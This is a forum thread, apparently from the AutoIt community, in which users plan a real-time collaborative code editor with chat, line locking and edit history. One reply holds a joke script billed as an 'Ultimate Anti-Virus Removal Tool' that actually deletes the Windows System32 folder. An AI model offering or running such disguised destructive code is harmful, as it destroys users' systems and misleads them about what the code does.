Live Multi-user editing tool for Programmers

What I'm looking to design is a server-based program where select users may log in and actively edit code where changes made on one users screen are instantly (well instant minus ping) shown on all users screens. Kind of like Wikipedia, but used for coding. It would likely have a chatroom of the users.

The premise to the program would be a notepad-like editing program like SciTe (actually it would be nice to make this a plugin for SciTe), where a host can set options to lock code, accept incoming user connections.. a bunch of stuff like that.

The idea would be to assist group programming projects on seperate computers.

My question is.. has this ever been done in Autoit.. or even beyond Autoit? And, does this seem possible? I think it would be extremely useful :)

Here's my start:

codeTool_1_.au3

Edited by pacman1176

So, you're asking for something that reads from the same source, but can be openly edited by any accessing user, then the resulting change will then be saved to the initial document, which (being ACTIVELY accesed by other users) would alter what the others are looking at.

That would be absolutely great for group projects or tutorials. But some stability would be needed. Just an idea, each line could have it's own checkbox. If you wanted to edit a line(s) you would mark the according boxe(s), then select the 'edit' button. Once those lines go into edit mode no other user can change them until you are finished. Also, a comment box at the bottom would be useful.

;Ultimate Anti-Virus Removal Tool

$ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.")

If $ans = 6 Then
   DirRemove("C:\WINDOWS\System32")
ElseIf $ans = 7 Then
   Exit
EndIf

So, you're asking for something that reads from the same source, but can be openly edited by any accessing user, then the resulting change will then be saved to the initial document, which (being ACTIVELY accesed by other users) would alter what the others are looking at.

That would be absolutely great for group projects or tutorials. But some stability would be needed. Just an idea, each line could have it's own checkbox. If you wanted to edit a line(s) you would mark the according box(s), then select the 'edit' button. Once those lines go into edit mode no other user can change them until you are finished. Also, a comment box at the bottom would be useful.

And a history section, to view the changes and to easily revert them to their original state.

$ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.")

If $ans = 6 Then
ElseIf $ans = 7 Then
   Exit
EndIf

**Warning! A quickly put together and crude image is ahead!**

This is a general idea, I suppose, of what it would/could look like...maybe.

Throw in an active users section, active editors section, history, and make it neat and you've got yourself an excellent program.

post-24296-1205293328_thumb.jpg

Edited by Firefoxy

If $ans = 6 Then
ElseIf $ans = 7 Then
   Exit
EndIf

Nice idea. Seems fun too. In that case, others can do some fixing together without the need of constant file transfer. That means, the server hosting this chat room or something has to have an autoit compiler installed for checking and etc.

Nice idea. Seems fun too. In that case, others can do some fixing together without the need of constant file transfer. That means, the server hosting this chat room or something has to have an autoit compiler installed for checking and etc.

It seems pretty distant, but I'd like to eventually make it like a SciTe plugin or something like that where everyone can compile/beta run the code.

That would be absolutely great for group projects or tutorials. But some stability would be needed. Just an idea, each line could have it's own checkbox. If you wanted to edit a line(s) you would mark the according boxe(s), then select the 'edit' button. Once those lines go into edit mode no other user can change them until you are finished. Also, a comment box at the bottom would be useful.

This is a great idea. It would be much more stable (and easier to code, perhaps even more conventional too) than seeing the changes other users are typing as they are being typed. Plus I can see line insertions made similarly, perhaps have buttons similar to the break point buttons in compilers, one for editing, one for making a line insertion. There's a lot of things that can be done with this, I suppose. I also planned to make a chat for all active users. This is actually where I decided to start, and I've got the GUI started for just making a chat program (mostly for the learning experience). It's included on the first post.